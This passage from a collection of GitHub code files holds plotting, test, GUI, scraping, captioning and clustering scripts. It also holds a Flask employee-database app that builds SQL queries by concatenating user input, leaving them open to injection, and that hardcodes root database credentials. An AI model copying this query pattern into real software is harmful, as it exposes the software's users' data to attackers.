left=0.2)\nplt.savefig('flag_more_skew.png')\n\n\n##################\n# Figure 7\n##################\n\nnum_stairs = 10\nnum_examples = 22\nadv_eps = (1.0 / 2)\nnoise_eps = 0.0\nx_noise = 0.1\nslope = 1\nnp.set_printoptions(precision=5)\ndiscrete_support = True\n\nknots = np.r_[np.arange(num_stairs), np.arange(num_stairs)+adv_eps]\nknots = np.sort(knots)\nweights_1 = np.asarray([1/5]*5)\nweights_2 = np.asarray([0.01]*(num_stairs-5))\nweights = np.concatenate([weights_1, weights_2])\nweights /= np.sum(weights)\nX = np.r_[np.arange(5).astype(float)]\nX = np.sort(X)\ny = slope*np.floor(X)\n\n# compute the population \\Sigma_0\n\n# first we must rotate the spline basis in a way that the correct norm is being minimized\nfeats = get_feats(X, knots)\n# add small identity for numerical stability\nP = get_P(knots) + 1e-10 * np.eye(22)\neigvals, eigs = np.linalg.eig(P)\neigvals = np.maximum(eigvals, 0)\nQ = eigs.dot(np.linalg.pinv(np.diag(np.sqrt(eigvals)))).dot(eigs.T)\nP_half = np.linalg.inv(Q)\n# Q.T X^T X Q\n\nS0_trans = np.zeros((feats.shape[1], feats.shape[1]))\nfor x in range(num_stairs):\n x1, x2 = get_feats(np.asarray([x, x+adv_eps]), knots).dot(Q)\n S0_trans += (1 - x_noise) * weights[x] * np.outer(x1, x1) + x_noise * weights[x] * np.outer(x2, x2)\n\ndef solve_rotated(X, y):\n feats = get_feats(X, knots)\n feats_trans = feats.dot(Q)\n theta_trans = np.linalg.pinv(feats_trans.T.dot(feats_trans)).dot(feats_trans.T.dot(y))\n return feats_trans, theta_trans\n\nfeats_std_trans, theta_std_trans = solve_rotated(X, y)\n# construct theta_star\nall_xs = np.r_[np.asarray([i for i in range(num_stairs)]), np.asarray([i + adv_eps for i in range(num_stairs)])]\nall_xs = np.sort(all_xs)\nall_ys = slope*np.floor(all_xs)\nall_feats_trans, theta_star_trans = solve_rotated(all_xs, all_ys)\n\ndef plot_std_aug(theta_std, theta_aug):\n X_stairs = np.arange(0, num_stairs).astype(float)\n y_stairs = slope*X_stairs\n for X_stair, y_stair in zip(X_stairs, y_stairs):\n plt.plot([X_stair, X_stair+adv_eps], [y_stair, y_stair], color='black', alpha=0.5)\n\n X_t = np.linspace(0, num_stairs-0.5, 100)\n plt.plot(X_t, get_feats(X_t, knots).dot(Q).dot(theta_std), label='Standard', linestyle='dashed', lw=5)\n plt.plot(X_t, get_feats(X_t, knots).dot(Q).dot(theta_aug), 
label='Augmented', linestyle='solid', lw=5)\n plt.legend()\n plt.legend()\n plt.scatter(X, y, color='black', s=75, zorder=1000)\n plt.xlabel(r'$t$')\n plt.ylabel(r'$f_{\\theta}(t)$')\n\n# add 3.5\nmatplotlib.rcParams.update({'font.size': 18})\n\nX_aug = np.r_[X, 3.5]\nX_aug = np.sort(X_aug)\ny_aug = slope*np.floor(X_aug)\nfeats_aug, theta_aug = solve_rotated(X_aug, y_aug)\nplt.figure(figsize=(5,5))\n\nplot_std_aug(theta_std_trans, theta_aug)\nplt.axis('equal')\nplt.xlim([-0.5, 10])\nplt.ylim([-0.5, 10])\nplt.xticks(np.arange(0, 10, 2.0))\nplt.yticks(np.arange(0, 10, 2.0))\nplt.scatter([3.5], [3], marker='X', s=75, color='C2', zorder=1000)\n\nplt.savefig('spline_add_35.png')\n\n# add 4.5\nmatplotlib.rcParams.update({'font.size': 22})\nfeats_std_trans, theta_std_trans = solve_rotated(X, y)\nall_xs = np.r_[np.asarray([i for i in range(num_stairs)]), np.asarray([i + adv_eps for i in range(num_stairs)])]\nall_xs = np.sort(all_xs)\nall_ys = slope*np.floor(all_xs)\nall_feats_trans, theta_star_trans = solve_rotated(all_xs, all_ys)# add 4.5\nmatplotlib.rcParams.update({'font.size': 18})\nX_aug = np.r_[X, 4.5]\nX_aug = np.sort(X_aug)\ny_aug = slope*np.floor(X_aug)\nfeats_aug, theta_aug = solve_rotated(X_aug, y_aug)\nplt.figure(figsize=(5,5))\n\nplot_std_aug(theta_std_trans, theta_aug)\nplt.axis('equal')\nplt.xlim([-0.5, 10])\nplt.ylim([-0.5, 10])\nplt.xticks(np.arange(0, 10, 2.0))\nplt.yticks(np.arange(0, 10, 2.0))\nplt.scatter([4.5], [4], marker='X', s=75, color='C2', zorder=1000)\nplt.savefig('spline_add_45.png')\n\n# plot the difference in test error as suggested in Theorem 1, Fig 7a\n\nplt.clf()\n# check if a perturbation does/does not satisfy the criterion\nhatS0 = feats_std_trans.T.dot(feats_std_trans)\n\ndef proj(S, rank_S=None):\n eigvals, eigs = np.linalg.eig(S)\n if rank_S is not None:\n sort_idx = np.argsort(-eigvals)\n eigvals[sort_idx[:rank_S]] = 1\n eigvals[sort_idx[rank_S:]] = 0\n else:\n eigvals[eigvals <= 1e-8] = 0.0\n eigvals[eigvals > 0] = 1.0\n return eigs.dot(np.diag(eigvals)).dot(eigs.T).real\nhat_proj_0 = np.eye(hatS0.shape[0]) - proj(hatS0, rank_S=feats_std_trans.shape[0])\n\ndef criterion(S0, theta_star, proj0, x):\n theta_0 = proj0.dot(theta_star)\n u = proj0.dot(x)\n if np.inner(u, u) < 1e-10:\n return 0\n rho = np.inner(theta_0, u) / np.inner(u, u)\n diff = 2 * rho * S0.dot(theta_0).dot(u) - rho**2 * S0.dot(u).dot(u)\n return diff\n\nmatplotlib.rcParams.update({'font.size': 16})\n\n# on the line\nlines = np.arange(10).astype(float)\nline_feats = get_feats(lines, knots)\nline_feats_trans = line_feats.dot(Q)\nline_diffs = []\nfor i in range(line_feats_trans.shape[0]):\n x = line_feats_trans[i]\n diff = -criterion(S0_trans, theta_star_trans, hat_proj_0, x).real\n line_diffs.append(diff)\n# not on the line\nperts = np.arange(10).astype(float) + adv_eps\npert_feats = get_feats(perts, knots)\npert_feats_trans = pert_feats.dot(Q)\npert_diffs = []\nfor i in range(pert_feats_trans.shape[0]):\n x = pert_feats_trans[i]\n diff = -criterion(S0_trans, theta_star_trans, hat_proj_0, x).real\n pert_diffs.append(diff)\nplt.scatter(lines, line_diffs, label='On the line', marker='o', s=90)\nplt.scatter(perts, pert_diffs, label='Perturbations', marker='^', s=90)\nplt.ylabel('Bias criterion (Aug - Std)')\nplt.xlabel(r'Augmentation point ($t$)')\nplt.xticks(np.arange(0, 10, 1.0))\nplt.legend(loc=\"upper right\")\nplt.subplots_adjust(bottom=0.15, left=0.15)\nplt.savefig('spline_perturbations.png')\nmatplotlib.rcParams.update({'font.size': 22})\n\n###############\n# Fig 
4\n###############\nmatplotlib.rcParams.update({'font.size': 28})\n# curr dataset\nX = np.r_[0,1]\nX = np.sort(X)\ny = slope*np.floor(X)\n\n# rotation matrix\nP = get_P(knots) + 1e-10 * np.eye(22)\neigvals, eigs = np.linalg.eig(P)\neigvals = np.maximum(eigvals, 0)\nQ = eigs.dot(np.linalg.pinv(np.diag(np.sqrt(eigvals)))).dot(eigs.T)\n\nX0 = get_feats(X, knots).dot(Q)\n\nxaug_raw = np.r_[X, 4.5]\nXaug = get_feats(xaug_raw, knots).dot(Q)\nyaug = np.floor(xaug_raw)\n\n# std estimator\nstdest = np.linalg.pinv(X0.T @ X0) @ (X0.T @ y)\n\naugest = np.linalg.pinv(Xaug.T @ Xaug) @ (Xaug.T @ yaug)\n# sigma\nS_trans = all_feats_trans.T @ all_feats_trans\nS_eigs, S_eigv = np.linalg.eig(S_trans)\n\nfor i in range(S_eigv.shape[1]):\n if i > 5:\n break\n plt.figure()\n plt.plot(np.arange(S_eigv.shape[0]), S_eigv[:, i], lw=5)\n plt.xlabel('t')\n plt.ylabel('f(t)')\n plt.title('$q_{%d}$' % (i+1))\n plt.xticks([])\n plt.yticks([])\n plt.tight_layout()\n plt.savefig(f'eig{i}.png')\n\n\n##########\n# Fig 8\n##########\n\nmatplotlib.rcParams.update({'font.size': 23})\n\ndef normalize(x):\n return x / np.linalg.norm(x)\nplt.figure(figsize=(5,5))\nfig, ax = plt.subplots()\nlocal_idx = 19\nglobal_idx = 2\n\nval_8 = 5\nval_45 = 1.5\nxaug8 = get_feats(np.asarray([val_8]), knots).dot(Q).squeeze()\nxaug45 = get_feats(np.asarray([val_45]), knots).dot(Q).squeeze()\nprojX0 = np.eye(X0.shape[1]) - proj(X0.T @ X0, rank_S=X0.shape[0])\nS_gl = (S_eigv.T @ projX0)[[local_idx, global_idx]]\ntstar_proj = normalize(S_gl @ theta_star_trans)\n# we reflected these two vectors for better presentation\nxaug_proj8 = -normalize( S_gl @ xaug8)\nxaug_proj45 = -normalize(S_gl @ xaug45)\n\n# plotting code\ntext_eps = 0.1\narr1 = ax.arrow(0, 0, tstar_proj[0], tstar_proj[1], head_width=0.05, head_length=0.1, length_includes_head=True, lw=3, color='C0', zorder=100)\nax.text(tstar_proj[0]-0.1, tstar_proj[1] - 4*text_eps, r'$\\theta^* - \\hat{\\theta}_{std}$', usetex=True, color='C0')\narr2 = ax.arrow(0, 0, xaug_proj8[0] , xaug_proj8[1], head_width=0.05, head_length=0.1, length_includes_head=True, lw=3, color='C4', zorder=100)\nax.text(xaug_proj8[0]-10*text_eps, xaug_proj8[1], r'$\\Pi_{lg}X(5)$', usetex=True, color='C4')\narr3 = ax.arrow(0, 0, xaug_proj45[0], xaug_proj45[1], head_width=0.05, head_length=0.1, length_includes_head=True, lw=3, color='C1', zorder=100)\nax.text(xaug_proj45[0]+text_eps, xaug_proj45[1]-0.1, r'$\\Pi_{lg}X(1.5)$', usetex=True, color='C1')\n\ntstar_proj_proj = np.inner(tstar_proj, xaug_proj45) * xaug_proj45\nplt.plot([1, tstar_proj_proj[0]], [0, tstar_proj_proj[1]], linestyle='dashed', color='C2')\n\nslope_perp = (-tstar_proj_proj[1]) / (1-tstar_proj_proj[0])\nlittle_sq_x_int = 0.75\nb_perp = -(slope_perp * little_sq_x_int)\nplt.plot([0.3, 0.2], [0.3*slope_perp + b_perp, 0.2*slope_perp + b_perp], linestyle='solid', color='C2')\nslope_nonperp = xaug_proj45[1] / xaug_proj45[0]\nb_nonperp = -0.15*slope_nonperp\nplt.plot([0.3, 0.36], [0.3*slope_nonperp + b_nonperp, 0.36*slope_nonperp + b_nonperp], linestyle='solid', color='C2')\n\nax.set_ylim([-1, 1.4])\nax.set_xlim([-0.2, 1.5])\nax.set_aspect('equal')\nax.spines['left'].set_position('zero')\nax.spines['right'].set_color('none')\nax.spines['bottom'].set_position('zero')\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('none')\nax.yaxis.set_ticks_position('none')\nax.set_yticklabels([])\nax.set_xticklabels([])\nax.text(0, 1.6, 'Global ($q_3$)', horizontalalignment='center', weight='bold')\nax.text(1.9, 0, 'Local ($q_{2s}$)', verticalalignment='center', 
weight='bold')\n# remove the ticks from the top and right edges\n\nplt.tight_layout()\nplt.savefig('local_global.png')\n","repo_name":"p-lambda/robust_tradeoff","sub_path":"splines/fig3478_spline.py","file_name":"fig3478_spline.py","file_ext":"py","file_size_in_byte":11943,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"27749963376","text":"import pytest\nfrom .find_char import find\n\n\n@pytest.mark.parametrize(\"input_d,expected_output\", [\n ((\"aaabbbccc\", \"a\"), 0),\n ((\"aaabbbccc\", \"c\"), 6),\n ((\"aaabbbccc\", \"d\"), -1),\n])\ndef test_normal_sum_int2(input_d, expected_output):\n result = find(input_d[0], input_d[1])\n print(\"input: {0}, output: {1}, expected: {2}\".format(input_d, result, expected_output))\n assert result == expected_output\n\n\nfrom .self_work import split\n\n\n@pytest.mark.parametrize(\"input_d,expected_output\", [\n ((\"Hello world!!!\", \" \"), ['Hello', 'world!!!']),\n ((\"Helloworld!!! \", \" \"), ['Helloworld!!!', '']),\n])\ndef test_split(input_d, expected_output):\n result = split(input_d[0], input_d[1])\n print(\"input: {0}, output: {1}, expected: {2}\".format(input_d, result, expected_output))\n assert result == expected_output\n","repo_name":"UsmanovTimur/pytest_lessons","sub_path":"example3/test_find_char.py","file_name":"test_find_char.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44668898500","text":"from flask import Flask,render_template, request, redirect\r\nimport mysql.connector\r\napp=Flask(__name__)\r\n\r\nbd=mysql.connector.connect( host=\"localhost\",\r\n user=\"root\",\r\n password=\"root\",\r\n database=\"flask\"\r\n )\r\nmycursor=bd.cursor()\r\n\r\n@app.route(\"/\")\r\ndef homePage():\r\n mycursor.execute(\"select * from personal\")\r\n records=mycursor.fetchall();\r\n \r\n return render_template(\"HomePage.html\",data=records) \r\n\r\n@app.route(\"/departments/\") \r\ndef departmentlist(dept):\r\n \r\n mycursor.execute(\"select * from personal where department='\"+dept+\"'\")\r\n records=mycursor.fetchall();\r\n \r\n return render_template(\"HomePage.html\",data=records) \r\n\r\n@app.route(\"/details/\") \r\ndef details(empno):\r\n \r\n mycursor.execute(\"select * from personal where empno='\"+empno+\"'\")\r\n personalrecord=mycursor.fetchall();\r\n mycursor.execute(\"select * from accounts where empno='\"+empno+\"'\")\r\n salaryrecords=mycursor.fetchall();\r\n return render_template(\"details.html\",personal=personalrecord,accounts=salaryrecords) \r\n \r\n@app.route(\"/newrecord\") \r\ndef newrecord():\r\n\r\n return render_template(\"inputform.html\") \r\n \r\n@app.route(\"/newrecordsalary\") \r\ndef newrecord2():\r\n\r\n return render_template(\"payslipinputform.html\") \r\n\r\n@app.route(\"/saverecord\",methods=[\"POST\"]) \r\ndef saverecord():\r\n \r\n name=request.form[\"na\"]\r\n dept=request.form[\"dept\"]\r\n sql1=\"insert into personal (name,department) values('{0}','{1}')\".format(name,dept)\r\n mycursor.execute(sql1)\r\n bd.commit()\r\n \r\n return redirect(\"/\") \r\n\r\n\r\n@app.route(\"/saverecord2\",methods=[\"POST\"]) \r\ndef saverecord2():\r\n empno=request.form[\"empno\"]\r\n amount=request.form[\"salary\"]\r\n sql1=\"insert into accounts (empno,salaryDate,amount) values({0},now(),{1})\".format(empno,amount)\r\n mycursor.execute(sql1)\r\n bd.commit()\r\n \r\n return redirect(\"/\") \r\n \r\n@app.route(\"/employeelist\",methods=[\"POST\"]) 
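# handles the department dropdown form; \"all\" lists every employee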
\r\ndef employeelist():\r\n    dept=request.form[\"dept\"]\r\n    if dept==\"all\":\r\n        mycursor.execute(\"select * from personal\")\r\n    else:\r\n        mycursor.execute(\"select * from personal where department='\"+dept+\"'\")\r\n    records=mycursor.fetchall();\r\n    return render_template(\"HomePage.html\",data=records)\r\n    \r\napp.run(debug=True)\r\n","repo_name":"Triptycal/flask","sub_path":"Flask/Project6/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"36052454627","text":"from PyQt5.QtWidgets import QWidget, QVBoxLayout, QTableWidget, QTableWidgetItem, QComboBox, QGroupBox, QCheckBox, QHBoxLayout, QPushButton, QButtonGroup\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, Qt\nfrom functools import partial\nfrom .saturation_window import input_T_or_P\n\nclass SelectUnitsWindow(QWidget):\n    all_units = pyqtSignal(list) # create a signal\n\n    def __init__(self):\n        super().__init__()\n        self.setWindowTitle(\"选择单位\")\n        self.setGeometry(685, 368, 550, 345)\n\n        layout = QVBoxLayout()\n        self.setLayout(layout)\n\n        self.selected_units = [\"K\", \"MPa\", \"m3\", \"kg; kmol\", \"kJ\", \"m/s\", \"μPa-s\", \"mW/m-K\", \"mN/m\"] # the unit currently selected for each quantity\n\n        self.create_table()\n\n    def create_table(self):\n        table_widget = QTableWidget()\n        table_widget.setColumnCount(2)\n        table_widget.setHorizontalHeaderLabels([\"单位名称\", \"单位\"])\n        table_widget.setShowGrid(False) # hide the grid lines\n        table_widget.verticalHeader().setVisible(False) # hide the vertical header\n\n        units_data = [\n            [\"温度\", [\"K\", \"°C\", \"°F\", \"°R\", \"T/Tc\"]],\n            [\"压力\", [\"Pa\", \"kPa\", \"MPa\", \"bar\", \"atm\", \"mmHg\", \"inHg\", \"psia\", \"p/pc\"]],\n            [\"体积\", [\"m3\", \"cm3\", \"dm3\", \"L\", \"in3\", \"ft3\", \"gal\", \"V/Vc\"]],\n            [\"质量/摩尔\", [\"g; mol\", \"kg; kmol\", \"lbm; lbmol\"]],\n            [\"能量\", [\"J\", \"kJ\", \"cal\", \"kcal\", \"Btu\", \"/RTc\"]],\n            [\"声速\", [\"m/s\", \"cm/s\", \"in/s\", \"ft/s\", \"mph\"]],\n            [\"粘度\", [\"Pa-s\", \"mPa-s\", \"μPa-s\", \"g/cm-s\", \"Poise\", \"cPoise\", \"lbm/ft-s\", \"lbm/ft-h\"]],\n            [\"热导率\", [\"W/m-K\", \"mW/m-K\", \"g-cm/s3-K\", \"cal/s-cm-K\", \"lbm-ft/s3-°F\", \"lbf/s-°F\", \"Btu/h-ft-°F\", \"Btu-in/h-ft2-°F\"]],\n            [\"表面张力\", [\"N/m\", \"mN/m\", \"dyn/cm\", \"lbf/ft\"]],\n        ]\n\n        table_widget.setColumnCount(2)\n        table_widget.setRowCount(len(units_data))\n        for row, data in enumerate(units_data):\n            name_item = QTableWidgetItem(data[0])\n            table_widget.setItem(row, 0, name_item)\n\n            unit_combo = QComboBox()\n            unit_combo.addItems(data[1])\n            unit_combo.setCurrentIndex(data[1].index(self.selected_units[row])) # set the index of the default option\n            table_widget.setCellWidget(row, 1, unit_combo)\n            unit_combo.currentIndexChanged.connect(partial(self.handle_unit_selected, row, unit_combo))\n\n        self.layout().addWidget(table_widget)\n\n        # make the dialog modal\n        self.setWindowModality(Qt.ApplicationModal)\n\n    def handle_unit_selected(self, row, combo):\n        unit = combo.currentText()\n        # update the selected_units list\n        self.selected_units[row] = unit\n\n        # emit the signal, passing selected_units as the argument\n        self.all_units.emit(self.selected_units)\n
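\n# Editor's sketch (not in the original): a parent window might consume the\n# signal like this before showing the dialog:\n#   units_win = SelectUnitsWindow()\n#   units_win.all_units.connect(lambda units: print(\"units now:\", units))\n#   units_win.show()\n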
\nclass SaturationTablesWindow(QWidget):\n    def __init__(self,units):\n        self.units = units\n        super().__init__()\n        self.setWindowTitle(\"特定饱和状态\")\n        self.setGeometry(400, 200, 500, 400)\n\n        layout = QVBoxLayout()\n        self.setLayout(layout)\n\n        hbox = QHBoxLayout()\n        layout.addLayout(hbox)\n\n        group_box1 = QGroupBox(\"类型\")\n        group_box2 = QGroupBox(\"变化量\")\n\n        hbox.addWidget(group_box1)\n        hbox.addWidget(group_box2)\n\n        # give box 1 a fixed size\n        group_box1.setFixedSize(200, 150)\n\n        # give box 2 a fixed size\n        group_box2.setFixedSize(200, 150)\n\n        # add checkboxes to box 1\n        self.checkbox1_1 = QCheckBox(\"饱和气液\")\n        self.checkbox1_2 = QCheckBox(\"饱和固液(熔化线)\")\n        self.checkbox1_3 = QCheckBox(\"饱和固气(升华线)\")\n\n        group_box1_layout = QVBoxLayout()\n        group_box1.setLayout(group_box1_layout)\n        group_box1_layout.addWidget(self.checkbox1_1)\n        group_box1_layout.addWidget(self.checkbox1_2)\n        group_box1_layout.addWidget(self.checkbox1_3)\n        self.checkbox1_1.setChecked(True) # check the first option by default\n\n        # add checkboxes to box 2\n        self.checkbox2_1 = QCheckBox(\"温度\")\n        self.checkbox2_2 = QCheckBox(\"压力\")\n        self.checkbox2_3 = QCheckBox(\"固定温度时的质量\")\n        self.checkbox2_4 = QCheckBox(\"固定压力时的质量\")\n\n        group_box2_layout = QVBoxLayout()\n        group_box2.setLayout(group_box2_layout)\n        group_box2_layout.addWidget(self.checkbox2_1)\n        group_box2_layout.addWidget(self.checkbox2_2)\n        group_box2_layout.addWidget(self.checkbox2_3)\n        group_box2_layout.addWidget(self.checkbox2_4)\n        self.checkbox2_1.setChecked(True) # check the first option by default\n\n        # add the buttons\n        button_layout = QHBoxLayout()\n        layout.addLayout(button_layout)\n\n        ok_button = QPushButton(\"确定\")\n        cancel_button = QPushButton(\"取消\")\n\n        button_layout.addStretch()\n        button_layout.addWidget(ok_button)\n        button_layout.addWidget(cancel_button)\n\n        # create button groups and make the options mutually exclusive\n        button_group1 = QButtonGroup(self)\n        button_group1.addButton(self.checkbox1_1)\n        button_group1.addButton(self.checkbox1_2)\n        button_group1.addButton(self.checkbox1_3)\n        button_group1.setExclusive(True) # mutually exclusive\n\n        button_group2 = QButtonGroup(self)\n        button_group2.addButton(self.checkbox2_1)\n        button_group2.addButton(self.checkbox2_2)\n        button_group2.addButton(self.checkbox2_3)\n        button_group2.addButton(self.checkbox2_4)\n        button_group2.setExclusive(True) # mutually exclusive\n\n        # connect checkbox1_2's stateChanged signal to the slot\n        self.checkbox1_2.stateChanged.connect(self.handle_checkbox1_2_state_changed)\n        self.checkbox1_3.stateChanged.connect(self.handle_checkbox1_2_state_changed)\n\n        cancel_button.clicked.connect(self.close) # connect the cancel button's clicked signal to close\n        ok_button.clicked.connect(self.open_input_saturation_window) # clicking OK opens the input sub-window\n        \n        self.setLayout(layout)\n\n        # make the dialog modal\n        self.setWindowModality(Qt.ApplicationModal)\n\n    @pyqtSlot(int)\n    def handle_checkbox1_2_state_changed(self, state):\n        # enable/disable checkbox2_3 and checkbox2_4 based on checkbox1_2's state\n        self.checkbox2_3.setDisabled(state == Qt.Checked)\n        self.checkbox2_4.setDisabled(state == Qt.Checked)\n        self.checkbox2_1.setChecked(True) # re-check the first option\n\n    def open_input_saturation_window(self):\n        self.selected_type, self.selected_vary = None, None\n        \n        # get the checked state of the type checkboxes\n        type_checkboxes = [self.checkbox1_1, self.checkbox1_2, self.checkbox1_3]\n        for i, checkbox in enumerate(type_checkboxes):\n            if checkbox.isChecked():\n                self.selected_type = i\n\n        # get the checked state of the 'vary' checkboxes\n        vary_checkboxes = [self.checkbox2_1, self.checkbox2_2, self.checkbox2_3, self.checkbox2_4]\n        for i, checkbox in enumerate(vary_checkboxes):\n            if checkbox.isChecked():\n                self.selected_vary = i\n\n        if self.selected_vary == 0 or self.selected_vary == 1:\n            self.input_saturation_window = input_T_or_P(self.selected_type, self.selected_vary,self.units)\n            self.input_saturation_window.show()\n            self.close() # close the current child window\n    ","repo_name":"ccmuyuu/CoolProp-hnu","sub_path":"windows/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"16168101129","text":"import json\n\nallmembers = []\n\nwith open('memberdetails.json') as json_file:\n    data = 
json.load(json_file)\n for key in data:\n myvalue = data[key]\n member = {}\n name = myvalue[\"Name\"]\n dp = myvalue[\"Profile Pic Image URL\"]\n headline = myvalue[\"Headline\"]\n tags = myvalue[\"Work Tags\"]\n email = myvalue[\"Email\"]\n linkedin = myvalue[\"LinkedIn URL\"]\n instagram = myvalue[\"Instagram URL\"]\n portfolio = myvalue[\"Portfolio URL\"]\n description = myvalue[\"Description\"]\n\n email = \"#\" if email == \"\" else email\n linkedin = \"#\" if linkedin == \"\" else linkedin\n instagram = \"#\" if instagram == \"\" else instagram\n portfolio = \"#\" if portfolio == \"\" else portfolio\n\n member[\"name\"] = name\n member[\"dp\"] = dp\n member[\"headline\"] = headline\n member[\"tags\"] = tags\n member[\"email\"] = email\n member[\"linkedin\"] = linkedin\n member[\"instagram\"] = instagram\n member[\"portfolio\"] = portfolio\n member[\"description\"] = description\n allmembers.append(member)\n\nprint(json.dumps(allmembers, indent = 1))\n\nf = open(\"members.js\", \"w\")\nf.write(\"var allmembers = \")\nf.write(json.dumps(allmembers, indent = 1))\n\nf.close()","repo_name":"yashp241195/SillyHumans","sub_path":"scripts/mapjson.py","file_name":"mapjson.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29899628392","text":"from selenium import webdriver\n\nclass FindByLinkText():\n\n def testMethod(self):\n driver = webdriver.Firefox()\n baseUrl = \"https://learn.letskodeit.com/p/practice\"\n\n driver.get(baseUrl)\n elementByLinkText = driver.find_element_by_link_text(\"Login\")\n\n if elementByLinkText is not None:\n print (\"We found an element by link text!\")\n\n elementByPartialLinkText = driver.find_element_by_partial_link_text(\"Pract\")\n\n if elementByPartialLinkText is not None:\n print (\"We found an element by partial link text!\")\n\n driver.quit()\n\n\nff = FindByLinkText()\nff.testMethod()","repo_name":"bartekh21/mighty-python","sub_path":"FindByLinkText.py","file_name":"FindByLinkText.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12365006028","text":"import torch\r\nfrom datasets import load_dataset\r\nfrom PIL import Image\r\nfrom transformers import AutoProcessor\r\n\r\nimport gradio as gr\r\n\r\n\r\n# load image\r\n#root = \"refined_data/validation/\"\r\n\r\n\r\n#dataset = load_dataset(\"imagefolder\", data_dir=root)#, split=\"validation\")\r\n\r\ndef predict(image):\r\n print(image)\r\n model = torch.load('git_finetune_2.pth',map_location = torch.device('cpu'))\r\n # image_read = Image.open(image)\r\n processor = AutoProcessor.from_pretrained(\"microsoft/git-base\")\r\n # print(processor)\r\n #example = dataset[0]\r\n #image = example[\"image\"]\r\n\r\n width, height = image.size\r\n image = image.resize((int(0.3*width), int(0.3*height)))\r\n\r\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n\r\n # prepare image for the model\r\n inputs = processor(images=image, return_tensors=\"pt\").to(device)\r\n pixel_values = inputs.pixel_values\r\n\r\n generated_ids = model.generate(pixel_values=pixel_values, max_length=50)\r\n generated_caption = processor.batch_decode(generated_ids, skip_special_tokens=True)\r\n\r\n return generated_caption\r\n\r\ngr.Interface(fn = predict,\r\n inputs=gr.Image(type=\"pil\", image_mode=\"RGB\"),\r\n outputs=gr.Textbox(label=\"Predicted caption\")).launch(share=True, 
server_port=7860)\r\n","repo_name":"sheetaljain15/Transformers_assessment","sub_path":"gradio_inference.py","file_name":"gradio_inference.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"20864144310","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom utils import load_iris\nfrom sklearn.decomposition import PCA\n\nclass KMeans():\n\n    def __init__(self, n, epoch=300, init_mode=\"kmeans++\"):\n        self.n = n # number of clusters\n        self.n_center = {} # center point of each cluster\n        self.sample_label = [] # cluster label of each sample\n        self.epoch = epoch # number of training iterations\n        self.clip = 1e-6 # stop early if the drop in total distance between iterations is below this threshold\n        self._init_mode = init_mode # how the initial centers are chosen\n\n    def _get_init(self):\n        # initialize the cluster centers\n        if self._init_mode == \"random\":\n            n_sample = self.x.shape[0] // self.n # samples per cluster; integer division keeps this simple\n            self.n_center = {} # stores the center of each cluster\n            for i in range(self.n):\n                choose_point = np.random.randint(0, self.x.shape[0], size=n_sample) # indices of the chosen samples\n                choose_sample = self.x[choose_point,:] # the chosen samples\n                self.n_center[i] = np.mean(choose_sample, axis=0) # initial center\n            print(self.n_center)\n        elif self._init_mode == \"kmeans++\":\n            _init_choose_point = np.random.randint(0, self.x.shape[0], size=1) # pick the very first point\n            self.n_center[0] = self.x[_init_choose_point,:] # use it as the first chosen center\n            for i in range(1, self.n):\n                sample_distance = np.zeros(shape=[self.x.shape[0], ]) # total distance from each sample to the existing centers\n                for j in list(self.n_center.keys()):\n                    sample_distance += (np.sum((self.x - self.n_center[j]) ** 2, axis=1))\n                choose_prob = sample_distance / np.sum(sample_distance)\n                choose_point = np.random.choice(np.arange(0, self.x.shape[0]), p=choose_prob)\n                self.n_center[i] = self.x[choose_point, :]\n\n    def cla_distance(self, center):\n        # compute the distance from every sample to each center\n        sample_distance = {} # distances from each sample to all centers\n        for i in range(len(self.x)):\n            temp = [] # distances to each cluster for this sample\n            for j in range(self.n):\n                temp.append(np.sum((self.x[i,:] - center[j]) ** 2))\n            sample_distance[i] = temp\n        return sample_distance\n\n    def cla_label(self, sample_distance):\n        total_distance = 0\n        for i, v in sample_distance.items():\n            self.sample_label.append(np.argmin(v))\n            total_distance += np.min(v)\n        return total_distance\n\n    def cla_center(self):\n        for i in range(self.n):\n            temp = self.x[np.array(self.sample_label) == i, :] # samples currently assigned to this cluster\n            self.n_center[i] = np.mean(temp, axis=0) # recompute the center\n\n    def fit(self, x):\n        pre_distance = 10000\n        self.x = x\n        # 1 initialize the centers\n        self._get_init()\n        # 2 train\n        for i in range(self.epoch):\n            # clear the label assignments\n            self.sample_label = []\n            # 2.1 compute the distance from every sample to the centers\n            sample_distance = self.cla_distance(self.n_center)\n            # 2.2 assign each sample to its nearest cluster\n            distance = self.cla_label(sample_distance)\n            if pre_distance - distance < self.clip:\n                break\n            pre_distance = distance\n            # 2.3 update the centers from the new assignments\n            self.cla_center()\n        # convert sample_label to an np.ndarray\n        self.sample_label = np.array(self.sample_label)\n\n\n(x_train, y_train), (x_test, y_test), _, target_names = load_iris()\nprint(x_train.shape, y_train.shape, x_test.shape, y_test.shape)\n\nmodel = KMeans(n=3)\nmodel.fit(x_train)\n\n# visualization: project onto 2 principal components for plotting\npca = PCA(n_components=2)\npca.fit(x_train)\nx_train = 
